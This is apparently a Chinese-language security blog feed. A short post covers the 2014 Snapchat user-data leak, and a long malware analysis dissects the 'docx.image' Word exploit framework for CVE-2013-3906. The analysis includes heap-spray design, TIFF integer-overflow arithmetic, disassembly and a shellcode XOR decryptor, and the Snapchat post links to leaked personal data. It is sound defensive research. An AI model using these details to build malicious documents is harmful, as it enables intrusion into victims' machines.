</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-43401302507491174502014-01-01T23:21:00.000+08:002014-02-10T04:35:54.057+08:00駭客公布 Snapchat 460 萬筆用戶個資<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNqv50ATF_hatgVWosFPsRqlFPXIAlAX-SaKPXN4g_ebd-LJJcFbHFMnipChdA2LFZHEeBDJN7T8mJaWcNsDr9X4uLqb_ogJJOjat2Vscj5HubBBAQM-3q4qdISHnrrblrR4FOZDRfNpg/s1600/snapchat-leak-geo-intensity-map2.png" width="748px"/><br>
<br>
去年最夯的 App 大概非 <a href="http://www.snapchat.com/">Snapchat</a> 莫屬了 -- 這個深受青少年喜愛的社群網路,號稱下一個臉書,幾個月前才剛<a href="http://tw.news.yahoo.com/%E6%9C%80%E5%A4%AFsnapchat-%E5%89%B5%E6%96%B0%E7%A4%BE%E4%BA%A4%E6%96%B0%E6%96%B9%E5%BC%8F-facebook%E4%B9%9F%E6%83%B3%E8%A6%81-053523301.html">婉拒了臉書</a>30億美元現金的併購提案,以及騰訊估其價身為 40億美元 的<a href="http://tw.news.yahoo.com/%E5%82%B3snapchat%E6%8B%92%E8%87%89%E6%9B%B8%E9%87%8D%E9%87%91%E6%94%B6%E8%B3%BC-082002067.html">投資提案</a>。<br>
就在新年的第一天,Snapchat 460萬用戶的個資(帳號、電話、位置),被<a href="http://www.snapchatdb.info/">放到了網路上</a>供人下載!我將資料下載後,一方面確認是個資無誤,一方面也順便做了一下用戶分布的分析,如上圖。有趣的是,Snapchat 用戶似乎以東岸為主,似乎跟大學的分布有關,還有...看來豪邁牛仔的確不太喜歡用智慧型手機。<br>
更多<a href="http://dr.waynehuang.cc/2014/01/snapchat-db-leak.html">詳細資料我寫在這裡</a>。若您有用 Snapchat,快去查一下是否您個資有被放出來任大家抓吧!<br>
<span class="fullpost">
</span>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1441759431140700676.post-43843426328424663252013-12-05T20:58:00.000+08:002014-02-10T04:36:38.957+08:00被俄、印、中各針對性攻擊者所利用之新型 Email 針對性攻擊惡意文件架構:「docx.image」之技術面與攻擊來源分析<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHY0jcF4SJ99Z7Ksk-kdNyU_e3SKIi4-20W25o2PEwInvqytoDYV9f6g5J-A31u_UKTHeiRaR328sZaEQNS4dyGNplF_QgXhhPnJTiugiwirBzPNFPM1Sb7DQH2XkIGuxBwNto8rpazk/s1600/CVE-2013-3096-figure-00-exploit-architecture-750px.png" /><br>
作者:<a href="https://www.facebook.com/wayne.armorize">Wayne Huang</a>、Wilson Chiou、以及阿碼證點與 Proofpoint 美國、歐洲團隊<br>
(英文版本同步發行於 <a href="http://www.proofpoint.com/threatinsight/posts/dissecting-docx-image-exploit-kit-cve-exploitation.php">Proofpoint 官方部落格</a>)<br>
<br>
近期我們了解,攻擊者針對之前的 <a href="http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx">CVE-2013-3906</a> 零時差漏洞所設計的攻擊文件,採用了多種新的技術,而至目前為止,至少被五組不同之攻擊集團所使用。我們稱這個框架為「docx.image」惡意文件框架,並認為它會成為以後惡意文件攻擊的樣版。我們利用此篇紀錄一下近期「docx.image」惡意文件架構被利用的狀況,並較深入解析此新惡意文件框架的設計原理。我們從兩個面向深入:<br>
<br>
a)惡意文件架構設計與所使用的技術<br>
b)採用的攻擊集團與所散播惡意軟體<br>
<br>
這兩個面向讓我們對於此攻擊之發展,有了相當不錯的理解與觀察角度。我們先列出我們的結論,然後再提供詳細的分析資料。<br>
<br>
<b>[結論]</b>
<ol>
<li>由於架構完整並內含數個較新的技術,我們認為 docx.image 架構會成為以後惡意文件攻擊的樣版</li>
<li>「docx.image」惡意文件框架,是利用了微軟 Word <a href="http://blogs.msdn.com/b/chrisrae/archive/2010/09/25/where-is-the-documentation-for-office-2010-s-docx-xlsx-pptx-formats.aspx">.docx</a> 的檔案格式,其實也就是 <a href="http://www.ecma-international.org/publications/standards/Ecma-376.htm">ECMA-376</a> ("Ecma Office Open XML")格式,與之前傳統的 <a href="http://www.digitalpreservation.gov/formats/digformatspecs/Word97-2007BinaryFileFormat%28doc%29Specification.pdf">.doc</a> 檔案格式很不一樣。</li>
<br>
<li>「docx.image」文件攻擊包的設計,可以很容易置換其中的惡意代碼(shellcode)與負載(payload),而不需要動到整個 .docx 文件。</li>
<br>
<li>第 I 類型被第一組攻擊者 <a href="http://www.f-secure.com/weblog/archives/00002576.html">「Janicab」</a>(俄國,擅長 Windows / MacOS 雙軌齊下,利用 Youtube 來中繼交換後門指令,全球都打)與第二組攻擊者 「Arlab」(印度打巴基斯坦與克羅埃西亞,我們命名的)所使用,文件本身即內含 payload 與惡意程式。Shellcode 用 XOR 加殼,payload 為一個 dll(a.l)。shellcode 將其寫入磁碟後,呼叫 LoadLibrary 將其執行。藉此 dll(a.l) 內嵌有惡意軟體 a.exe 與假乾淨文件,一樣利用 XOR 脫殼後,取出利用。</li>
<br>
<li>第 II 類型被第三組攻擊者「<a href="http://normanshark.com/pdf/Norman_HangOver%20report_Executive%20Summary_042513.pdf">Operation Hangover</a>」(印度打巴基斯坦與伊朗)、第四組<a href="http://cmu95752.wordpress.com/2012/09/23/trojan-taidoor-a-modern-chinese-apt/">「Taidoor」</a>(專打台灣,此次 email:公共工程委員會 / 103年度公共場所錄影監視規劃.docx)、與第五組「<a href="http://www.securelist.com/en/analysis/204792287/Winnti_More_than_just_a_game">Winnti</a>」(專打亞洲,著眼線上遊戲相關)等三組針對性攻擊團體所利用。惡意文件本身不內含 payload 與惡意程式,由 shellcode 使用 URLDownloadToFileA API 來下載惡意程式並執行之。</li>
<br>
<li>第 II 類型的 shellcode 採用了反沙盒(反 hooking)的 <a href="http://www.phrack.org/issues.html?issue=62&id=5">hook-hopping</a> 技術,而 第 I 類型並未使用。</li>
<br>
<li>兩類型皆實做了「ActiveX heap spray」-- 利用 Word 本身的功能來完成 heap spraying,所以看不到 heap spray 的相關攻擊碼。同時,可以利用單一個圖檔,重複噴灑,而不需要於 Word 內部內嵌多個圖檔,徒增檔案大小以及特徵。</li>
<br>
<li>在第 I 類型之中,shellcode 利用 <a href="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/">egg-hunting</a> 來找到 payload,然後透過 XOR 脫殼後,寫成檔案 「a.l」並使用 LoadLibrary API 執行之。</li>
<li>此「docx.image」惡意文件框架,應於今年三月時,由俄國方面的攻擊者完成,後銷售給本文中之五個針對性攻擊團體使用。</li>
<br>
<li>兩類型的惡意 .docx 文件,都會在成功植入後門後,將原本的惡意 .docx 檔案「毀屍滅跡」,置換成一個乾淨的 .docx 檔案。</li>
</ol>
<span class="fullpost">
<b>[事件回溯]</b><br>
<ol>
<li>三月底:利用此漏洞的攻擊程式由俄方面研究成功(docx 中遺留下不少俄文),而其中許多檔案的建立日期為三月下旬至四月初。</li>
<br>
<li>7月7日:<a href="http://www.f-secure.com/weblog/archives/00002576.html">Janicab</a> 團體首次對 Proofpoint 的客戶發動攻擊,惡意程式是 VBE 寫的,利用 Youtube 來中繼交換後門指令。雖然當時我們台灣阿碼科技做出的雲端沙盒偵測平台,幫 Proofpoint 擋下了這一波攻擊,但是當時我們並未查覺這波惡意文件的針對性攻擊是針對 <a href="http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx">CVE-2013-3906</a> 這個零時差漏洞進行攻擊。</li>
<br>
<li>7月22日: <a href="http://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/">Avast 發表關於</a> Janicab 集團的攻擊事件。Avast 當時並未意識該次攻擊乃利用了<a href="http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx">CVE-2013-3906</a> 這個零時差漏洞。<a href="http://www.f-secure.com/weblog/archives/00002576.html">Janicab</a> 團體是第一個被發現使用 docx.image 惡意文件架構進行攻擊的團體。</li>
<br>
<li>9月27日:「Arlab」集團(我們命名的)開始使用 docx.image 惡意文件攻擊 Proofpoint 的客戶。我們的雲端沙盒偵測平台於當時完封此波攻擊。當時我們並未發覺仍是利用此零時差漏洞。事後透過資料庫中的紀錄,我們發現了此「Arlab」針對性攻擊團體,並成功取得了對方的感染紀錄檔、程式、與工具。此團體以印度成員為主,對象則鎖定巴基斯坦與克羅埃西亞。當時他們利用 docx.image 散播植入 <a href="http://botnetlegalnotice.com/citadel/files/Patel_Decl_Ex20.pdf">Citadel</a> 後門。「Arlab」為第二個被發現使用 docx.image 惡意文件架構的針對性攻擊團體。</li>
<br>
<li>11月5日:<a href="http://blogs.mcafee.com/mcafee-labs/mcafee-labs-detects-zero-day-exploit-targeting-microsoft-office-2">McAfee 注意到</a>有第三個集團使用 docx.image 惡意文件架構進行攻擊,並且也注意到,所打的是一個零時差漏洞:<a href="http://blogs.technet.com/b/srd/archive/2013/11/05/cve-2013-3906-a-graphics-vulnerability-exploited-through-word-documents.aspx">CVE-2013-3906</a>。McAfee 是第一個向微軟回報此漏洞的資安廠商,但是其部落格文章中,並沒有特別指認出,或去研究該攻擊團體。</li>
<br>
<li>11月6日:<a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/the-dual-use-exploit-cve-2013-3906-used-in-both-targeted-attacks-and-crimeware-campaigns.html">FireEye 於部落格文章中</a>,寫到了有關第二個團體(我們取名「Arlab」,FireEye取名 「Arx」)和第三個團體(<a href="http://normanshark.com/pdf/Norman_HangOver%20report_Executive%20Summary_042513.pdf">Operation Hangover</a>,McAfee 沒有指出這點)。同時,我們獨立的研究,顯示這一波的攻擊的受害者主要是針對巴基斯坦和克羅埃西亞兩國的目標。
</li>
<br>
<li>11月12日:<a href="http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/exploit-proliferation-additional-threat-groups-acquire-cve-2013-3906.html">FireEye 指出</a>,已有第四個團體使用 docx.image 惡意文件架構:專門攻擊台灣的 Taidoor 團體。這個集團主要是針對臺灣為目標。(此次 email:公共工程委員會 / 103年度公共場所錄影監視規劃.docx)。我們的研究顯示,這次攻擊對於 docx.image 架構的用法,很類似 <a href="http://www.f-secure.com/weblog/archives/00002576.html">Janicab</a> 團體的用法。
</li>
<br>
<li>11月14日:<a href="http://www.securelist.com/en/analysis/204792287/Winnti_More_than_just_a_game">卡巴斯基發佈</a>第五個集團使用此框架: <a href="http://www.securelist.com/en/analysis/204792287/Winnti_More_than_just_a_game">Winnti 集團</a>。此集團專打亞洲,著眼線上遊戲相關目標,以及竊取線上遊戲的程式碼。我們的研究顯示,這次 Winnti 對於 docx.image 架構的用法,很類似 Arlab 集團。</li>
</ol>
<br>
在二種類型中,第 I 類型的漏洞利用攻擊程式比較複雜,所以我們接下來,將第 I 類型作為我們分析的基礎。<br>
<br>
<b>[解析 docx.image 惡意文件架構,第 I 類型]</b><br>
<br>
docx.image 惡意程式框架到底有什麼特殊?上述提及的五個團體又做了什麼客製化動作,以達成目的?<br>
<br>
我們來看 Arlab 集團攻擊的方式。Arlab 客製化 docx.image 架構,做出了一個微軟的 Word <a href="http://blogs.msdn.com/b/chrisrae/archive/2010/09/25/where-is-the-documentation-for-office-2010-s-docx-xlsx-pptx-formats.aspx">.docx</a> 文件,然後利用 email 的方式,將該文件傳送給攻擊目標。<a href="http://blogs.msdn.com/b/chrisrae/archive/2010/09/25/where-is-the-documentation-for-office-2010-s-docx-xlsx-pptx-formats.aspx">.docx</a> 文件是一種 <a href="http://www.ecma-international.org/publications/standards/Ecma-376.htm">ECMA-376</a> ("Ecma Office Open XML") 文件,與之前傳統的 Word <a href="http://www.digitalpreservation.gov/formats/digformatspecs/Word97-2007BinaryFileFormat%28doc%29Specification.pdf">.doc</a> 文件,在格式上有很大的不同。.docx 檔案整個是一個 .zip 檔,所以我們可以直接將附檔名改成 .zip,然後用系統的檔案總管,將一個 .docx 檔案解壓開來。<br>
<br>
Arlab 所送出的惡意 .docx 文件,整包的架構如下圖:
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHHY0jcF4SJ99Z7Ksk-kdNyU_e3SKIi4-20W25o2PEwInvqytoDYV9f6g5J-A31u_UKTHeiRaR328sZaEQNS4dyGNplF_QgXhhPnJTiugiwirBzPNFPM1Sb7DQH2XkIGuxBwNto8rpazk/s1600/CVE-2013-3096-figure-00-exploit-architecture-750px.png" /><br>
<br>
被攻擊的目標收到這個 .docx 檔案,若將之點開,如果環境對,就會被植入 <a href="http://botnetlegalnotice.com/citadel/files/Patel_Decl_Ex20.pdf">Citadel</a> 後門。此外,這個 .docx 內部所附的 payload,還會在成功植入後門後,將原本的惡意 .docx 檔案「毀屍滅跡」,置換成一個乾淨的 .docx 檔案。<br>
<br>
我們首先列出上述過程的每個步驟,然後逐步來分析:<br>
<br>
第 1 步: 目標受害者打開 .docx 文件, 由於文件本身的設計,Word 開始在記憶體中做 heap spray。<br>
第 2 步: .docx 文件內部有個 image2.tiff 圖形檔(內部是一張 jpg 圖),Word 開始想辦法將該圖顯示出來。<br>
第 3 步: 由於該 image2.tiff 中的特殊設計,造成 Word 的記憶體被溢位(透過 ogl.dll)。<br>
第 4 步: shellcode 被執行起來,並將自身脫殼。<br>
第 5 步: shellcode 取得 18 個有用到的 kernel32 API 函式的指標。<br>
第 6 步: shellcode 利用 <a href="https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/">egg-hunting</a> 技巧,搜尋出位於 activeX1.bin 中的 payload。<br>
第 7 步: shellcode 將此 payload 脫殼,並以檔名 "a.l" 寫入磁碟。<br>
第 8 步: shellcode 呼叫 LoadLibrary,將 a.l 載入執行。<br>
<br>
<b>第 1 步: 目標受害者打開 .docx 文件, 由於文件本身的設計,Word 開始在記憶體中做 heap spray。</b><br>
<br>
所有的攻擊碼中,看不到 heap spray 的相關攻擊碼;原因是,docx.image 的設計,是利用 Word 本身的功能來完成 heap spraying。把 .docx 解開後可以看出,在 word\activeX\_rels\目錄下,activeXn.xml.rels 檔案,都有相同的內容:<br>
<pre>
<Relationship Id="rId1" Type="http://...skip..." Target="activeX.bin"/≷
</Relationships≷
</pre>
.docx 中,總共有 42個 activexn.xml.rels 這樣的檔案 -- 從 activex1.xml.rels 到 activex42.xml.rels,而且內容都完全相同。當受害者打開本 .docx 檔案時,Word 將檔案載入到記憶體、解壓縮它,並開始解析所有的.xml 和 xml.rels 檔案。上述的安排告訴 Word,要將 activex.bin 載入至記憶體中 42 次,所以 Word 照辦,於是就等於把 activex.bin 的內容於 heap 中噴灑了42次。您說這是不是相當有趣的 heap spray 方式呢?<br>
<br>
<b>第 2 步: .docx 文件內部有個 image2.tiff 圖形檔(內部是一張 jpg 圖),Word 開始想辦法將該圖顯示出來。</b><br>
<br>
我們注意到在 word\ 目錄下(正確的名稱是「儲存,store」), 有個指向 image2.tiff 的 document.xml 檔案,裡面有俄文:"Рисунок"("圖"):
<pre>
<wp:docPr id="7" name="Рисунок 6" descr="image1.tiff"/>
</pre>
這是當初 docx.image 的研發人員所留下的 「殘留物」,整個 .docx 中其實找不到任何 "image1.tiff" 檔案。然而,由 word\_rels\document.xml.rels 所指到的 "media/image2.tiff" 檔案,則是存在的:
<pre>
<Relationship Id="rId53"
Type="http://schemas...skip...relationships/"
Target="media/image2.tiff"/>
</pre>
因此,此時 Word 會嘗試載入並秀出 image2.tiff。<br>
<br>
<b>第 3 步: 由於該 image2.tiff 中的特殊設計,造成 Word 的記憶體被溢位(透過 ogl.dll)。</b><br>
為了要秀出 image2.tiff,Word 使用了以下 .dll 中的函式:<br>
<pre>
C:\Program Files (x86)\Common Files\microsoft shared\OFFICE12\OGL.DLL
</pre>
該 .dll 就是本漏洞 CVE-2013-3906 的所在位置。<a href="http://www.fileformat.info/format/tiff/egff.htm">TIFF 的檔案格式</a>中規定,一個 TIFF 檔案的第 2 個 DWORD,描述了該檔中第一個 IFD (Image File Directory) 於檔案中的相對位置:<br>
<pre>
typedef struct _TiffHeader
{
WORD Identifier; /* Byte-order Identifier */
WORD Version; /* TIFF version number (always 2Ah) */
DWORD IFDOffset; /* Offset of the first Image File Directory*/
} TIFHEAD;
</pre>
我們來看一下 docx.image 惡意文件的檔頭長得如何:<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8gk0SZ2U1DTwZH2ckaSZKMBJaHWmettfmVhryF03Y3cmMJdp5bXyYCpW5OLNxkZvnyMux6EtbRBOo-XepwVeI9q0DovOCpyF3FTzzPeRgunkEr1CH_KtczZsPb80DphD8wYwSK0tThXk/s1600/CVE-2013-3096-figure-0A-beginning-of-image2-tiff.png" /><br>
從上圖我們可以看到, 第一個 IFD 的所在位置是0x000049C8,所以我們到那裏:<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWMscjFS-yGTzNT8yE3XAcGn-ZDCipap2jxw0V2jNqet5-RkCDXwFFClOC-zqc_InAnkth3gPvBlujG9znBit2tW9YYYUbsE6UgNq2ErNwaJL5Z3_abdvU4fbCX-duswyaCyM7rQvWXe4/s1600/CVE-2013-3096-figure-0B-17-IFDs.png" /><br>
從上面看出,TagCount = 0x0011 = 17;總共有17個 IFD。 每個 IFD 的開頭都是一個 Tag,用來指定該 IFD 的種類。以下我們把 image2.tiff 中的17個 IFD 的標記都列出來:
<pre>
Tag | Type | count | val OR offset
00FE | 0004 | 00000001 | 00000000 - NewSubfileType
0100 | 0003 | 00000001 | 000002AB - ImageWidth = 2ABh (683)
0101 | 0003 | 00000001 | 00000152 - ImageLength = 152h (338)
0102 | 0003 | 00000003 | 0000331E - BitsPerSample
0103 | 0003 | 00000001 | 00000006 - Compression = JPEG
0106 | 0003 | 00000001 | 00000002 - PhotometricInterpretation
0111 | 0004 | 00000044 | 00003434 - StripOffsets
0115 | 0003 | 00000001 | 00000003 - SamplesPerPixel
0116 | 0004 | 00000001 | 00000005 - RowsPerStrip
<font color="#FF0000">0117 | 0004 | 00000044 | 00003324 - StripByteCounts</font>
011A | 0005 | 00000001 | 0000330E - XResolution
011B | 0005 | 00000001 | 00003316 - YResolution
011C | 0003 | 00000001 | 00000001 - PlanarConfiguration
0128 | 0003 | 00000001 | 00000002 - ResolutionUnit = Inch
013D | 0003 | 00000001 | 00000001 - Predictor
<font color="#F00">0202 | 0004 | 00000001 | 00001484 - JPEGInterchangeFormatLength</font>
0201 | 0004 | 00000001 | 00003544 - JPEGInterchangeFormat
</pre><br>
當 ogl.dll 嘗試秀出 image2.tiff 時,會發現此 TIFF 中有一張 jpg 圖,於是 ogl.dll 會開始配置所需要的記憶體,大小 = JFIF_size + strip_size [0] + [1] strip_size +......+ strip_size [n-1]。所以,這裡的重點就是 StripByteCounts (0x0117)和 JPEGInterchangeFormatLength (0x0202)這兩個 IFD。<br>
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBWdlcs-voOtXMpgkmX0UwiBJ3ss3XrIeuGY4k6nRc4w-8WlHYDgCWwWOmJ-G1-FBe3LicW1AIdauSUIlxccCsu8ia1Jna1V2AvvBWBBsuo2gAupNnsMAlXy2cPpYsoxTBsT8L14vppoM/s1600/CVE-2013-3096-figure-0C-important-IFD-tags.png" /><br>
從第 16 個IFD(JPEGInterchangeFormatLength,0x0202)我們可以看出,我們 JFIF 的大小是 0x1484。那麼剩下來要算的就是 StripSize = strip_size [0] + [1] strip_size +......+ strip_size [n-1]了。<br>
<br>
從第 10 個的 IFD(StripByteCounts,0x0117),我們可以看出,這個 IFD 有 0x44 strips,而且在檔案中的相對位址為 0x3324。那麼我們就到 image2.tiff 中的 0x3324 位址處看一下。我們看到:
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitKV677OzYKq9wlQy66X1ip1x1cgnEUEamfkD8MYbb_NGgJ4WzuOZ6plQa6oyIPHgGc3Siqj2W9g92Mqr8Qgo9q5LjU_GzznqbebKoWHrtsgy2hnzZN5iY9pwlwytzTtgWuxeJrUKFSgI/s1600/CVE-2013-3096-figure-0D-tiff-strips.png" /><br>
所以,我們如果把 0x44 strips 全部加總起來,可以得到 StripSize =0xFFFFB898 + 0x000000B2 + 0x000000B2 + 0x000000B3 + 0x000000B3 + 0x000000B1 + 0x000000B1 + … (0x44 DWORDs) = <b>0xFFFFEAEC</b>。<br>
<br>
終於,我們可以算出,要秀出該 JPG 圖,所需要配置的記憶體大小 = JFIF_size + ((0x44)*2+8) + strip_size[0] + strip_size[1]+...+strip_size[n-1] = 0x1484 + 0x90 + 0xFFFFEAEC = <b>0x100000000</b>:哈,剛好溢位了,變成 0!也就是說,ogl.dll 配置了一個大小為 0 的記憶體空間,要將位於 image2.tiff 中的 JPG 圖拷貝進去,於是當然就產生了記憶體溢位。對於上述的公式,我們直接看 ogl.dll 反組譯後的程式碼,就更清楚了:
<pre>
<font color="#F90">3BDC576D</font> push ebp
<font color="#F90">3BDC576E</font> mov ebp, esp
<font color="#F90">3BDC5770</font> movzx ecx, word ptr [edi+<font color="#060">0ECh</font>]
<font color="#F90">3BDC5777</font> xor eax, eax
<font color="#F90">3BDC5779</font> test ecx, ecx
<font color="#F90">3BDC577B</font> push esi
<font color="#F90">3BDC577C</font> jle short loc_3BDC5793
<font color="#F90">3BDC577E</font> mov edx, [edi+<font color="#060">0A0h</font>] <font color="#00F">; StripByteCounts table's base</font>
<font color="#F90">3BDC577E</font> <font color="#00F">; address (0x3324)</font>
<font color="#F90">3BDC5784</font> movzx esi, word ptr [edi+<font color="#060">0ECh</font>] <font color="#00F">; 0x44 strips</font>
<font color="#F90">3BDC578B</font>
<font color="#F90">3BDC578B</font> sumStripByteCounts: <font color="#00F">; CODE XREF: sub_3BDC576D+24j</font>
<font color="#F90">3BDC578B</font> add eax, [edx]
<font color="#F90">3BDC578D</font> add edx, <font color="#060">4</font>
<font color="#F90">3BDC5790</font> dec esi
<font color="#F90">3BDC5791</font> jnz short sumStripByteCounts
<font color="#F90">3BDC5791</font> <font color="#00F">; Sum up all 0x44 strips,</font>
<font color="#F90">3BDC5791</font> <font color="#00F">; at the end, eax = 0xFFFFEAEC</font>
<font color="#F90">3BDC5793</font>
<font color="#F90">3BDC5793</font> loc_3BDC5793: <font color="#00F">; CODE XREF: sub_3BDC576D+Fj</font>
<font color="#F90">3BDC5793</font> mov esi, [ebp+<font color="#060">Size</font>] <font color="#00F">; esi = JPEGInterchangeFormatLength</font>
<font color="#F90">3BDC5793</font> <font color="#00F">; (0x1484)</font>
<font color="#F90">3BDC5796</font> lea eax, [eax+ecx*2+<font color="#060">8</font>]
<font color="#F90">3BDC5796</font> <font color="#00F">; eax += (0x44*2+8 = 0x90)</font>
<font color="#F90">3BDC5796</font> <font color="#00F">; so now, eax = 0xFFFFEB7C</font>
<font color="#F90">3BDC579A</font> add eax, esi <font color="#00F">; 0xFFFFEB7C + 0x1484, overflow</font>
<font color="#F90">3BDC579A</font> <font color="#00F">; eax = 0</font>
<font color="#F90">3BDC579C</font> push eax <font color="#00F">; dwBytes</font>
<font color="#F90">3BDC579D</font> mov [edi+<font color="#060">160h</font>], eax
<font color="#F90">3BDC57A3</font> call RtlAllocateHeap <font color="#00F">; allocate 0 bytes (writing anything</font>
<font color="#F90">3BDC57A3</font> <font color="#00F">; to the buffer will cause overflow)</font>
<font color="#F90">3BDC57A8</font> test eax, eax
<font color="#F90">3BDC57AA</font> mov [edi+<font color="#060">164h</font>], eax
<font color="#F90">3BDC57B0</font> jnz short loc_3BDC57BA
<font color="#F90">3BDC57B2</font> or eax, <font color="#060">0FFFFFFFFh</font>
<font color="#F90">3BDC57B5</font>
<font color="#F90">3BDC57B5</font> loc_3BDC57B5: <font color="#00F">; CODE XREF: sub_3BDC576D+10Dj</font>
<font color="#F90">3BDC57B5</font> pop esi
<font color="#F90">3BDC57B6</font> pop ebp
<font color="#F90">3BDC57B7</font> retn <font color="#060">8</font>
</pre>
我們繼續往下看,接下來,ogl.dll 呼叫 memcpy() 將 JFIF(JPG 圖)複製到剛才所配置好的記憶體(該記憶體大小為 0):<br>
<pre>
<font color="#F90">3BDC57BA</font> mov ecx, [ebp+<font color="#060">Src</font>]
<font color="#F90">3BDC57BD</font> push ebx
<font color="#F90">3BDC57BE</font> push dword ptr [edi+<font color="#060">108h</font>]
<font color="#F90">3BDC57C4</font> push esi
<font color="#F90">3BDC57C5</font> call sub_3BE21ADC
<font color="#F90">3BDC57CA</font> mov ebx, eax
<font color="#F90">3BDC57CC</font> test ebx, ebx
<font color="#F90">3BDC57CE</font> jl loc_3BDC5890
<font color="#F90">3BDC57D4</font> push [ebp+<font color="#060">Size</font>] <font color="#00F">; Size =</font>
<font color="#F90">3BDC57D4</font> <font color="#00F">; JPEGInterchangeFormatLength</font>
<font color="#F90">3BDC57D4</font> <font color="#00F">; (0x1484)</font>1
<font color="#F90">3BDC57D7</font> mov esi, [edi+<font color="#060">164h</font>]
<font color="#F90">3BDC57DD</font> push [ebp+<font color="#060">Src</font>] <font color="#00F">; Src = The JFIF within the</font>
<font color="#F90">3BDC57DD</font> <font color="#00F">; TIFF (JPEGInterchangeFormat)</font>
<font color="#F90">3BDC57E0</font> push esi <font color="#00F">; Dst = the 0-bytes buffer</font>
<font color="#F90">3BDC57E0</font> <font color="#00F">; previously allocated</font>
<font color="#F90">3BDC57E1</font> call <font color="#00F">memcp</font>
</pre>
memcpy()會從哪裡複製到哪裡,又複製多少位元呢?它會從 IFD:JPEGInterchangeFormat(在 image2.tiff 中的第 17個 IFD)所指定的 JFIF 位址開始,拷到之前所配置的 0 位元組的記憶體內,一共會複製由 IFD:JPEGInterchangeFormatLenth (在 image2.tiff 中的第 16 個 IFD)所指定的 0x1484 個位元組。<br>
<br>
這也就這意味著,此惡意文件會造成一次長度為 0x1484 個位元組的溢位,溢位發生的位址,是在 esi 所指的地方,所拷貝的內容,則是 JFIF,也就是 image2.tiff 中那張 JPG 圖的內容。<br>
<br>
這張 JPG 圖的內容,將會是溢位後的重點。我們來看看,究竟這圖的內容是什麼?這張圖(JFIF)的所在位址,應該是在.docx 的 IFD:JPEGInterchangeFormat = 0x3544 這裡(見上面的 17 JFD 表)。那麼我們去 0x3544 的地方看看:
<img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIKeQ2v3LTY47r7T11Yxxz_MS50nNPzKnzGpuFHOSbu5YkCs1lI7JkFWwvsIM-C6yHUpANwALvAg6DbxDIdIIMwWgO8tDAj1_kwGg-SQnIu5zEldKPd6NsHa4tSoKvQSN3gKOtoR01gB0/s1600/CVE-2013-3096-figure-0G-JFIF-0808.png" /><br>
以上就是會被複製的資料了!所以從這裡開始,ogl.dll 將一共複製 0x1484 個位元組,到剛才那個配置大小為 0 的記憶體位置,並造成記憶體溢出。被這溢出所影響到的程式片段如下:<br>
<pre>
<font color="#F90">3BE2026B</font> push ebp
<font color="#F90">3BE2026C</font> mov ebp, esp
<font color="#F90">3BE2026E</font> mov eax, [ebp+<font color="#060">arg_0</font>]
<font color="#F90">3BE20271</font> lea ecx, [eax+<font color="#060">158h</font>]
<font color="#F90">3BE20277</font> push ecx
<font color="#F90">3BE20278</font> push <font color="#060">0</font>
<font color="#F90">3BE2027A</font> push [ebp+<font color="#060">arg_4</font>]
<font color="#F90">3BE2027D</font> push dword ptr [eax]
<font color="#F90">3BE2027F</font> call dword ptr [eax+<font color="#060">20h</font>] <font color="#00F">; eax+0x20 points to 08080808</font>
<font color="#F90">3BE2027F</font> <font color="#00F">; due to the memory overflow</font>
</pre>
最後的呼叫( call) 會跳到 eax+0x20 所記錄的位址。由於該記憶體被溢位了,溢位後的內容變成了 0x08080808,所以,這個 call 也就變成會跳到 0x08080808 那裡了。那麼 0x08080808 那裡是什麼資料呢?在第 3 步中所進行完畢的 heap spray 動作,就是造成 0x08080808 附近的記憶體,會被Word 自己噴灑成 activex.bin 的內容,也就是說,shellcode 就在那裡 :)<br>
<br>
<b>第 4 步: shellcode 被執行起來,並將自身脫殼。</b><br>
shellcode 一如往常地,是經過 XOR 加殼的。在 docx.image 中,shellcode的大小(0x27E bytes)以及脫殼的key(0xEE)是寫死不變的,然後一開始的 shellcde 以一個簡單的 XOR 迴圈來進行脫殼: <br>
<pre>
<font color="#F90">0854</font> nop
<font color="#F90">0855</font> nop
<font color="#F90">0856</font> nop
<font color="#F90">0857</font> nop
<font color="#F90">0858</font> and sp, <font color="#060">0FFFCh</font>
<font color="#F90">085D</font> jmp short loc_870
<font color="#F90">085F</font>
<font color="#F90">085F</font> <font color="#00F">; =============== S U B R O U T I N E ==========</font>
<font color="#F90">085F</font> code_decryptor proc near
<font color="#F90">085F</font> pop ebx <font color="#00F">; obtain address of</font>
<font color="#F90">085F</font> <font color="#00F">; encrypted shellcode</font>
<font color="#F90">0860</font> dec ebx
<font color="#F90">0861</font> xor ecx, ecx
<font color="#F90">0863</font> or cx, <font color="#060">27Eh</font> <font color="#00F">; hard-coded code size=0x27E</font>
<font color="#F90">0868</font>
<font color="#F90">0868</font> loc_868: <font color="#00F">; CODE XREF: code_decryptor+Dj</font>
<font color="#F90">0868</font> xor byte ptr [ebx+ecx], 0EEh
<font color="#F90">0868</font> <font color="#00F">; XOR all bytes with 0xEE</font>
<font color="#F90">0868</font> <font color="#00F">; (hard-coded key: 0xEE)</font>
<font color="#F90">086C</font> loop loc_868
<font color="#F90">086C</font> code_decryptor endp
<font color="#F90">086C</font>
<font color="#F90">086E</font> jmp short loc_875
